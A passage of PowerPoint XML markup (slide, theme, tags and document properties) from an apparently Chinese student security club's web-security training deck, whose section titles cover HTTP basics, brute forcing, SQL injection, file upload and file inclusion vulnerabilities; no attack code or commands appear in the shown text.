            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="111125" y="6040120"/>
            <a:ext cx="7612380" cy="657225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://www.runoob.com/http/http-status-codes.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136650" y="1275715"/>
            <a:ext cx="10535285" cy="4262755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.GUIDESSETTING" val="{&quot;Id&quot;:&quot;GuidesStyle_Normal&quot;,&quot;Name&quot;:&quot;GuidesStyle_Normal&quot;,&quot;Kind&quot;:0,&quot;OldGuidesSetting&quot;:{&quot;HeaderHeight&quot;:15.0,&quot;FooterHeight&quot;:9.0,&quot;SideMargin&quot;:5.5,&quot;TopMargin&quot;:0.0,&quot;BottomMargin&quot;:0.0,&quot;IntervalMargin&quot;:1.5}}"/>
  <p:tag name="ISLIDE.THEME" val="1ca27200-b45a-4bf5-9f77-d1a92f71ef71"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZmQ2ZDMxZjk5ZTg1Y2ZmN2Y1ODkwNDQxODA3NGViOTIifQ=="/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Designed by iSlide">
  <a:themeElements>
    <a:clrScheme name="iSlide">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="D40001"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="8E0101"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="3B0202"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="4E4D4D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="909090"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A8A8A8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0563C1"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="954F72"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 3">
      <a:majorFont>
        <a:latin typeface="JetBrains Mono"/>
        <a:ea typeface="微软雅黑"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="JetBrains Mono"/>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BITs2Sys PPT模板</Template>
  <TotalTime>0</TotalTime>
  <Words>9552</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>533</Paragraphs>
  <Slides>67</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67</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="76" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>JetBrains Mono</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Designed by iSlide</vt:lpstr>
      <vt:lpstr>BITs2Sys招新培训</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>1.Web基础第一次培训</vt:lpstr>
      <vt:lpstr>1.1.http协议简介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1.2.暴力破解</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>1.3.SQL注入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1.4.文件上传漏洞</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1.5.文件包含漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>1.6.web安全相关岗位简介</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>1.7.web安全实战途径</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Manager>BITs2Sys</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Nuo Zhang</dc:creator>
  <cp:lastModifiedBy>1diOt9</cp:lastModifiedBy>
  <cp:revision>262</cp:revision>
  <cp:lastPrinted>2023-06-15T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T10:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-27T08:42:24Z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1ca27200-b45a-4bf5-9f77-d1a92f71ef71</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>233B726EDF7D4F64B21326A439A48020_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.22529</vt:lpwstr>
  </property>
</Properties>
</file>